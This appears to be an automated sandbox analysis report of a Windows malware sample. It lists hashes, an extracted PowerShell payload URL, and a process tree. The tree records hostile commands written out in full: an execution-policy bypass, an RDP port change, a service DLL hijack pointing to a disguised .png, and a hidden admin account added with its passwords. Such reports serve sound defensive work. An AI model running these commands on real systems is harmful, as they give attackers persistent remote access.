Analysis
-
max time kernel
116s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
23-09-2021 11:03
Static task
static1
Behavioral task
behavioral1
Sample
f71c575754e1f5890ad8b35afd08b8be.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
f71c575754e1f5890ad8b35afd08b8be.exe
Resource
win10-en-20210920
General
-
Target
f71c575754e1f5890ad8b35afd08b8be.exe
-
Size
5.9MB
-
MD5
f71c575754e1f5890ad8b35afd08b8be
-
SHA1
69803b96f3820fabd81c79d422a1fa2a72ccb699
-
SHA256
046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
-
SHA512
32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 10 4020 powershell.exe 12 4020 powershell.exe 13 4020 powershell.exe 14 4020 powershell.exe 16 4020 powershell.exe 18 4020 powershell.exe 20 4020 powershell.exe 22 4020 powershell.exe 24 4020 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1668 1668 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pj0fudg4.d3m.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_w50vzthw.l3t.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE586.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE536.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE565.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE5B6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE5C6.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3760 powershell.exe 3760 powershell.exe 3760 powershell.exe 3848 powershell.exe 3848 powershell.exe 3848 powershell.exe 4092 powershell.exe 4092 powershell.exe 4092 powershell.exe 684 powershell.exe 684 powershell.exe 684 powershell.exe 3760 powershell.exe 3760 powershell.exe 3760 powershell.exe 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
f71c575754e1f5890ad8b35afd08b8be.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2392 f71c575754e1f5890ad8b35afd08b8be.exe Token: SeDebugPrivilege 3760 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeIncreaseQuotaPrivilege 3848 powershell.exe Token: SeSecurityPrivilege 3848 powershell.exe Token: SeTakeOwnershipPrivilege 3848 powershell.exe Token: SeLoadDriverPrivilege 3848 powershell.exe Token: SeSystemProfilePrivilege 3848 powershell.exe Token: SeSystemtimePrivilege 3848 powershell.exe Token: SeProfSingleProcessPrivilege 3848 powershell.exe Token: SeIncBasePriorityPrivilege 3848 powershell.exe Token: SeCreatePagefilePrivilege 3848 powershell.exe Token: SeBackupPrivilege 3848 powershell.exe Token: SeRestorePrivilege 3848 powershell.exe Token: SeShutdownPrivilege 3848 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeSystemEnvironmentPrivilege 3848 powershell.exe Token: SeRemoteShutdownPrivilege 3848 powershell.exe Token: SeUndockPrivilege 3848 powershell.exe Token: SeManageVolumePrivilege 3848 powershell.exe Token: 33 3848 powershell.exe Token: 34 3848 powershell.exe Token: 35 3848 powershell.exe Token: 36 3848 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeIncreaseQuotaPrivilege 4092 powershell.exe Token: SeSecurityPrivilege 4092 powershell.exe Token: SeTakeOwnershipPrivilege 4092 powershell.exe Token: SeLoadDriverPrivilege 4092 powershell.exe Token: SeSystemProfilePrivilege 4092 powershell.exe Token: SeSystemtimePrivilege 4092 powershell.exe Token: SeProfSingleProcessPrivilege 4092 powershell.exe Token: SeIncBasePriorityPrivilege 4092 powershell.exe Token: SeCreatePagefilePrivilege 4092 powershell.exe Token: SeBackupPrivilege 4092 powershell.exe Token: SeRestorePrivilege 4092 powershell.exe Token: SeShutdownPrivilege 4092 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeSystemEnvironmentPrivilege 4092 powershell.exe Token: SeRemoteShutdownPrivilege 4092 powershell.exe Token: SeUndockPrivilege 4092 powershell.exe Token: SeManageVolumePrivilege 4092 powershell.exe Token: 33 4092 powershell.exe Token: 34 4092 powershell.exe Token: 35 4092 powershell.exe Token: 36 4092 powershell.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeIncreaseQuotaPrivilege 684 powershell.exe Token: SeSecurityPrivilege 684 powershell.exe Token: SeTakeOwnershipPrivilege 684 powershell.exe Token: SeLoadDriverPrivilege 684 powershell.exe Token: SeSystemProfilePrivilege 684 powershell.exe Token: SeSystemtimePrivilege 684 powershell.exe Token: SeProfSingleProcessPrivilege 684 powershell.exe Token: SeIncBasePriorityPrivilege 684 powershell.exe Token: SeCreatePagefilePrivilege 684 powershell.exe Token: SeBackupPrivilege 684 powershell.exe Token: SeRestorePrivilege 684 powershell.exe Token: SeShutdownPrivilege 684 powershell.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeSystemEnvironmentPrivilege 684 powershell.exe Token: SeRemoteShutdownPrivilege 684 powershell.exe Token: SeUndockPrivilege 684 powershell.exe Token: SeManageVolumePrivilege 684 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f71c575754e1f5890ad8b35afd08b8be.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2392 wrote to memory of 3760 2392 f71c575754e1f5890ad8b35afd08b8be.exe powershell.exe PID 2392 wrote to memory of 3760 2392 f71c575754e1f5890ad8b35afd08b8be.exe powershell.exe PID 3760 wrote to memory of 1280 3760 powershell.exe csc.exe PID 3760 wrote to memory of 1280 3760 powershell.exe csc.exe PID 1280 wrote to memory of 2720 1280 csc.exe cvtres.exe PID 1280 wrote to memory of 2720 1280 csc.exe cvtres.exe PID 3760 wrote to memory of 3848 3760 powershell.exe powershell.exe PID 3760 wrote to memory of 3848 3760 powershell.exe powershell.exe PID 3760 wrote to memory of 4092 3760 powershell.exe powershell.exe PID 3760 wrote to memory of 4092 3760 powershell.exe powershell.exe PID 3760 wrote to memory of 684 3760 powershell.exe powershell.exe PID 3760 wrote to memory of 684 3760 powershell.exe powershell.exe PID 3760 wrote to memory of 1980 3760 powershell.exe reg.exe PID 3760 wrote to memory of 1980 3760 powershell.exe reg.exe PID 3760 wrote to memory of 68 3760 powershell.exe reg.exe PID 3760 wrote to memory of 68 3760 powershell.exe reg.exe PID 3760 wrote to memory of 2804 3760 powershell.exe reg.exe PID 3760 wrote to memory of 2804 3760 powershell.exe reg.exe PID 3760 wrote to memory of 584 3760 powershell.exe net.exe PID 3760 wrote to memory of 584 3760 powershell.exe net.exe PID 584 wrote to memory of 1524 584 net.exe net1.exe PID 584 wrote to memory of 1524 584 net.exe net1.exe PID 3760 wrote to memory of 740 3760 powershell.exe cmd.exe PID 3760 wrote to memory of 740 3760 powershell.exe cmd.exe PID 740 wrote to memory of 1044 740 cmd.exe cmd.exe PID 740 wrote to memory of 1044 740 cmd.exe cmd.exe PID 1044 wrote to memory of 3748 1044 cmd.exe net.exe PID 1044 wrote to memory of 3748 1044 cmd.exe net.exe PID 3748 wrote to memory of 4052 3748 net.exe net1.exe PID 3748 wrote to memory of 4052 3748 net.exe net1.exe PID 3760 wrote to memory of 3980 3760 powershell.exe cmd.exe PID 3760 wrote to memory of 3980 3760 powershell.exe cmd.exe PID 3980 wrote to memory of 972 3980 cmd.exe cmd.exe PID 3980 wrote to memory of 972 3980 cmd.exe cmd.exe PID 972 wrote to memory of 372 972 cmd.exe net.exe PID 972 wrote to memory of 372 972 cmd.exe net.exe PID 372 wrote to memory of 3328 372 net.exe net1.exe PID 372 wrote to memory of 3328 372 net.exe net1.exe PID 1264 wrote to memory of 1620 1264 cmd.exe net.exe PID 1264 wrote to memory of 1620 1264 cmd.exe net.exe PID 1620 wrote to memory of 1892 1620 net.exe net1.exe PID 1620 wrote to memory of 1892 1620 net.exe net1.exe PID 1912 wrote to memory of 3832 1912 cmd.exe net.exe PID 1912 wrote to memory of 3832 1912 cmd.exe net.exe PID 3832 wrote to memory of 3824 3832 net.exe net1.exe PID 3832 wrote to memory of 3824 3832 net.exe net1.exe PID 3736 wrote to memory of 3652 3736 cmd.exe net.exe PID 3736 wrote to memory of 3652 3736 cmd.exe net.exe PID 3652 wrote to memory of 3988 3652 net.exe net1.exe PID 3652 wrote to memory of 3988 3652 net.exe net1.exe PID 3748 wrote to memory of 1280 3748 cmd.exe net.exe PID 3748 wrote to memory of 1280 3748 cmd.exe net.exe PID 1280 wrote to memory of 1032 1280 net.exe net1.exe PID 1280 wrote to memory of 1032 1280 net.exe net1.exe PID 1784 wrote to memory of 1512 1784 cmd.exe net.exe PID 1784 wrote to memory of 1512 1784 cmd.exe net.exe PID 1512 wrote to memory of 1776 1512 net.exe net1.exe PID 1512 wrote to memory of 1776 1512 net.exe net1.exe PID 2804 wrote to memory of 1912 2804 cmd.exe net.exe PID 2804 wrote to memory of 1912 2804 cmd.exe net.exe PID 1912 wrote to memory of 644 1912 net.exe net1.exe PID 1912 wrote to memory of 644 1912 net.exe net1.exe PID 2240 wrote to memory of 1980 2240 cmd.exe WMIC.exe PID 2240 wrote to memory of 1980 2240 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dzjrgmon\dzjrgmon.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA212.tmp" "c:\Users\Admin\AppData\Local\Temp\dzjrgmon\CSC56A59F14EE92459EBF46ED605ECECEE3.TMP"4⤵PID:2720
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1980
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:68 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2804
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1524
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4052
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3328
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3180
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1044
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:1892
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc LijNdwj5 /add1⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\net.exenet.exe user wgautilacc LijNdwj5 /add2⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc LijNdwj5 /add3⤵PID:3824
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:3988
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵PID:1032
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:1776
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc LijNdwj51⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\net.exenet.exe user wgautilacc LijNdwj52⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc LijNdwj53⤵PID:644
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:1980
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3700
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:1032
-
